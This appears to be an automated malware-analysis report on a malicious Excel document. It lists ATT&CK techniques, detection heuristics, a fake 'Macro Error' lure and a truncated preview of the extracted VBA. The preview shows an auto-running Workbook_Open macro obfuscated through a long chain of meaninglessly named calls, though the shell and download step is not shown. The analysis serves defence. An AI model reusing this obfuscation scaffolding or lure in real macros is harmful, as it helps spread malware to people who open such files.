MALICIOUS
228
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is an Excel document containing a Workbook_Open VBA macro that executes a shell command. The document body displays a fake 'Macro Error' message to lure the user into enabling macros. The VBA code is heavily obfuscated but the presence of Shell() calls and the Workbook_Open auto-execution indicate a malicious intent to download and execute a second-stage payload.
Heuristics 6
-
ClamAV: Xls.Malware.Valyria-10036513-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 88596 bytes |
SHA-256: e361d773fbc4e9e44732e39975ed956ab4061ea77321547ca2fe6c655a3e2c71 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WorKbOOK_oPen(): Call hCMvpTIkAOFLi: End Sub
Function hCMvpTIkAOFLi() As Integer
Call FOlBtvPFVMoZv
End Function
Function FOlBtvPFVMoZv()
Call aTDggaXNalZUl
End Function
Sub aTDggaXNalZUl()
Call kJTWGQHxQmEfE
End Sub
Function kJTWGQHxQmEfE()
Call IVrcKrNSkknuR
End Function
Static Sub IVrcKrNSkknuR()
Call TFzquHUVycZSh
End Sub
Private Sub TFzquHUVycZSh()
Call bMvFrzuhybhgj
End Sub
Private Function bMvFrzuhybhgj() As Long
Call VxjDJGyHTdkrq
End Function
Private Function VxjDJGyHTdkrq() As Boolean
Call BUudHzXGJGbhe
End Function
Private Sub BUudHzXGJGbhe()
Call sVOBwISIpGHuU
End Sub
Function sVOBwISIpGHuU() As Long
Call jWiZlRMKUGoHK
End Function
Sub jWiZlRMKUGoHK()
Call OTYFuMxkSWAAI
End Sub
Private Function OTYFuMxkSWAAI() As Boolean
Call oPQmbmMccWGNm
End Function
Static Sub oPQmbmMccWGNm()
Call PLISJLbVnXLZR
End Sub
Private Sub PLISJLbVnXLZR()
Call kchpfRxJtbkIY
End Sub
Static Function kchpfRxJtbkIY() As Double
Call IoGvjsDfNZTWk
End Function
Static Sub IoGvjsDfNZTWk()
Call SeVlJimODayiD
End Sub
Private Sub SeVlJimODayiD()
Call ziSribVAQPIwY
End Sub
Sub ziSribVAQPIwY()
Call HpOGeTwMQOQJZ
End Sub
Function HpOGeTwMQOQJZ() As Single
Call BaCFxazmlQTVh
End Function
Function BaCFxazmlQTVh() As String
Call GBVyOuJsRsEyq
End Function
Static Function GBVyOuJsRsEyq() As Byte
Call yCpWDCEuwslLf
End Function
Static Sub yCpWDCEuwslLf()
Call pDJusLzxbsSYV
End Sub
Sub pDJusLzxbsSYV()
Call vobUwfdBFJuDH
End Sub
Sub vobUwfdBFJuDH()
Call WkTAeEsuPKAPl
End Sub
Function WkTAeEsuPKAPl() As String
Call KBUxpQeYEHKeJ
End Function
Sub KBUxpQeYEHKeJ()
Call XLxGPdZBLMbzP
End Sub
Static Function XLxGPdZBLMbzP() As Variant
Call pCBjwlGPYDVlh
End Function
Private Sub pCBjwlGPYDVlh()
Call RrZoBHkCoWVVc
End Sub
Sub RrZoBHkCoWVVc()
Call ZxWDyzLOoVdid
End Sub
Sub ZxWDyzLOoVdid()
Call TjJCQFOoJXgul
End Sub
Function TjJCQFOoJXgul() As Double
Call apFQMypAJWoIm
End Function
Function apFQMypAJWoIm() As Single
Call iwCfJqQMJVwVn
End Function
Function iwCfJqQMJVwVn() As String
Call bipebwTmeXzhv
End Function
Sub bipebwTmeXzhv()
Call joltXpuyeWHuw
End Sub
Sub joltXpuyeWHuw()
Call rvhIUhVJeVPIx
End Sub
Sub rvhIUhVJeVPIx()
Call kgVGmoYjzYSTF
End Sub
Function kgVGmoYjzYSTF() As Date
Call snRVjgzvzXahG
End Function
Function snRVjgzvzXahG() As Variant
Call ztNkfYaHzVjvI
End Function
Function ztNkfYaHzVjvI() As Currency
Call tfBixfdhUYmGP
End Function
Private Sub tfBixfdhUYmGP()
Call BmxxuXEtUXuUR
End Sub
Static Sub BmxxuXEtUXuUR()
Call IstMqPfFUWCiS
End Sub
Static Function IstMqPfFUWCiS() As Currency
Call CehLJWifpYFtZ
End Function
Function CehLJWifpYFtZ() As Object
Call KkdZFOJrpXNHb
End Function
Function KkdZFOJrpXNHb() As String
Call RDgglhxipAJJt
End Function
Function RDgglhxipAJJt() As Byte
Call IEAEaqskUAqWj
End Function
Sub IEAEaqskUAqWj()
Call zFUcOznnAAXkY
End Sub
Function zFUcOznnAAXkY() As String
Call qHozDIipfADxO
End Function
Static Sub qHozDIipfADxO()
Call hIIXsRdsKAkKE
End Sub
Static Function hIIXsRdsKAkKE() As Object
Call YJcvhZYupzRXu
End Function
Sub YJcvhZYupzRXu()
Call QLxTWiTwUzykk
End Sub
Function QLxTWiTwUzykk() As Single
Call HMRqLrOzzzfxa
End Function
Sub HMRqLrOzzzfxa()
Call yNlOAAJBfzLKP
End Sub
Static Function yNlOAAJBfzLKP() As Currency
Call pPFmoJEDKysYF
End Function
Static Sub pPFmoJEDKysYF()
Call gQZKdSzGpyZlv
End Sub
Static Function gQZKdSzGpyZlv() A
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.